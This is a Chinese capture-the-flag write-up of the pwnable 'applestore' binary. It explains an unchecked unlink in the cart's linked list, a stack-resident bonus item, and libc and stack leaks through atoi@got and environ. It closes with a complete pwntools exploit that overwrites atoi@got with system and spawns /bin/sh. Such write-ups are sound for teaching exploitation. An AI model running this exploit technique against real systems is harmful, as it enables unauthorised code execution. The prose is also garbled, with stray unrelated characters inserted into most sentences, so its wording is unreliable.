pwnable_applestore

checksec

checksec

IDA

由add和insert可以逆向出每一個(gè)設(shè)備的結(jié)構(gòu)體

typedef struct shop
{
    char *name;
    int price;
    Shop *bk;
    Shop *fd;
}Shop,PShop

delete

......  
while ( item )
  {
    if ( v1 == idx )
    {
      BK = item->bk;
      FD = item->fd;
      if ( FD )
        FD->bk = BK;
      if ( BK )
        BK->fd = FD;
      printf("Remove %d:%s from your shopping cart.\n", v1, item->Name);
      return __readgsdword(0x14u) ^ v7;
    }
    ++v1;
    item = item->bk;
  }
.......

這功能是把chunk從item雙鏈中取出掂摔，但是只校驗(yàn)了FD、BK的存在赢赊，沒有校驗(yàn)合理性乙漓，如果我們可以控制 Item 的fd、bk域携，就能實(shí)現(xiàn) unlink 的效果

棧內(nèi)變量覆蓋

那么如何控制fd簇秒、bk

checkout

  v4 = __readgsdword(0x14u);
  total = cart();
  if ( total == 7174 )
  {
    puts("*: iPhone 8 - $1");
    asprintf(&a1, "%s", "iPhone 8");
    a1_4 = 1;
    insert(&a1);
    total = 7175;
  }
  printf("Total: $%d\n", total);
  puts("Want to checkout? Maybe next time!");

我們回顧add鱼喉，發(fā)現(xiàn)每一個(gè) item 都是以堆的方式存在雙鏈表中秀鞭，而當(dāng)總價(jià)為7174時(shí)，會(huì)贈(zèng)送price為1的item扛禽，而這個(gè)item是在棧上面的锋边，但是如何實(shí)現(xiàn)棧的修改呢？

有兩個(gè)可以利用的漏洞點(diǎn)

• Cart

int cart()
{
  signed int j; // eax
  signed int counter; // [esp+18h] [ebp-30h]
  int total; // [esp+1Ch] [ebp-2Ch]
  Shop *I; // [esp+20h] [ebp-28h]
  char buf; // [esp+26h] [ebp-22h]
  unsigned int v6; // [esp+3Ch] [ebp-Ch]

  v6 = __readgsdword(0x14u);
  counter = 1;
  total = 0;
  printf("Let me check your cart. ok? (y/n) > ");
  fflush(stdout);
  my_read(&buf, 0x15u);
  if ( buf == 'y' )
  {
    puts("==== Cart ====");
    for ( I = item_804B070; I; I = I->bk )
    {
      j = counter++;
      printf("%d: %s - $%d\n", j, I->Name, I->price);
      total += I->price;
    }
  }
  return total;
}

這里看上去沒問題编曼，但是我們仔細(xì)在棧幀上看

stack

這樣就控制了 fd豆巨、bk

泄露libc

然后我們就想泄露libc

Cart里面會(huì)輸出當(dāng)前所有的Item，而之前我們已經(jīng)可以控制 item 的fd和bk掐场，那先換為 atoi@got往扔，這樣去泄露

因?yàn)槌绦蚴?Partial RELRO ，所以可以覆蓋got表實(shí)現(xiàn)getshell

如何得到7174

這個(gè)窮舉也可

total = 0
counter = 1
while 1:
    total += 199*counter
    if (7174-total)%299==0:
        print counter
        print (7174-total)/299
        break
    total = 0
    counter+=1

6個(gè)item_1熊户，20個(gè)item_2

思路

• 控制 item 的fd和bk萍膛，那先換為 atoi@got，泄露libc
• 在delete Item->fd=aoti-8嚷堡，Item->bk=system蝗罗，將atoi換為system
• getshell

但是控制 item 的fd和bk的機(jī)會(huì)只有一次，無法完成填入system的參數(shù)蝌戒，后面看Writeup才知道還有一種方法

可以通過libc中的environ來泄露棧地址串塑， 泄露了棧地址后通過調(diào)試算出偏移可以得到delete函數(shù)的ebp地址，delete函數(shù)中的ebp指向的是handler函數(shù)中的ebp
ebp -> handler_ebp

可以通過改寫handler_ebp 為got_atoi + 0x22來完成對(duì)got表的覆寫

從delete函數(shù)返回到handler函數(shù)中北苟， 還原棧幀的過程中ebp 的值為改寫成got_atoi - 0x22, 這樣在調(diào)用my_read 函數(shù)中時(shí)可以對(duì)got_atoi 進(jìn)行覆寫桩匪， 改寫了got表后要考慮的就是/bin/sh 的位置， 可以看到atoi 的參數(shù)就是剛剛輸入的數(shù)據(jù)友鼻， 這時(shí)可以輸入p32(system) + "|| /bin/sh"或 p32(system) + “;/bin/sh” 來繞過system 調(diào)用/bin/sh
————————————————
版權(quán)聲明：本文為CSDN博主「蒼崎青子」的原創(chuàng)文章傻昙，遵循CC 4.0 BY-SA版權(quán)協(xié)議瑟慈，轉(zhuǎn)載請(qǐng)附上原文出處鏈接及本聲明。
原文鏈接：https://blog.csdn.net/qq_43189757/article/details/102850665

這里再強(qiáng)調(diào)幾個(gè)概念：

EBP：棧底指針該寄存器

ESP：棧頂指針寄存器

程序運(yùn)行時(shí)棧地收縮或擴(kuò)張屋匕，也就是ebp和esp的增大或減小

當(dāng)我們delete結(jié)束時(shí)葛碧，返回到handle，當(dāng)handle恢復(fù)棧時(shí)过吻，假設(shè)再返回時(shí)我們把ebp變成了 atoi@got+0x22

此時(shí)的棧

image

利用EBP收縮讓 atoi@got+0x22變?yōu)?code>handle的EBP进泼，然后泄露environ來計(jì)算棧的地址來修復(fù)

我們構(gòu)造的

change atoi

這個(gè)時(shí)候atoi@got立馬變成system，執(zhí)行system("SYS_ADDR||/bin/sh;")纤虽，從而getshell

EXP

from pwn import *
import sys

name = sys.argv[1]
elf = ELF(name)
libc = elf.libc
# libc = ELF("libc-2.23.so")
sh = 0

l64 = lambda      :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(sh.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :sh.sendlineafter(str(a),str(b))
sa  = lambda a,b  :sh.sendafter(str(a),str(b))
lg  = lambda name,data : sh.success(name + ": 0x%x" % data)
se  = lambda payload: sh.send(payload)
rl  = lambda      : sh.recv()
sl  = lambda payload: sh.sendline(payload)
ru  = lambda a     :sh.recvuntil(str(a))

def cmd(ch):
    sla("> ",ch)

def List():
    cmd(1)

def Add(kind):
    cmd(2)
    sla("Device Number> ",kind)

def free(idx):
    cmd(3)
    sla("Item Number> ",idx)

def Cart(payload):
    cmd(4)
    sla("Let me check your cart. ok? (y/n) > ",payload)

def checkout(payload):
    cmd(5)
    sla("Let me check your cart. ok? (y/n) > ",payload)


def main(ip,port,debug,mode):
    global sh
    if debug==0:
        context.log_level = "debug"
    else:
        pass
    if mode==0:
        sh = process(name)
    else:
        sh = remote(ip,port)
    for i in range(6):
        Add("1")
    for i in range(20):
        Add("2")

    checkout("y")
    Cart("ya"+p32(elf.got["atoi"])+p32(0))

    libcbase = u32(ru("\xf7")[-4:])-libc.sym["atoi"]
    environ = libcbase + libc.sym["environ"]
    system = libcbase + libc.sym["system"]
    lg("libcbase",libcbase)
    lg("environ",environ)
    lg("system",system)
    
    Cart('ya' + p32(environ)+ p32(0))
    ru("27: ")
    stack = u32(sh.recv(4))
    lg("stack",stack)
    payload = '27' + p32(0) + p32(0)
    payload += p32(elf.got["atoi"] + 0x22) + p32(stack - 0x100 - 0xc)
    free(payload)
    sla("> ", p32(system) + "||/bin/sh")
    sh.interactive()

if __name__ == '__main__':
    main("node3.buuoj.cn","25844",0,0)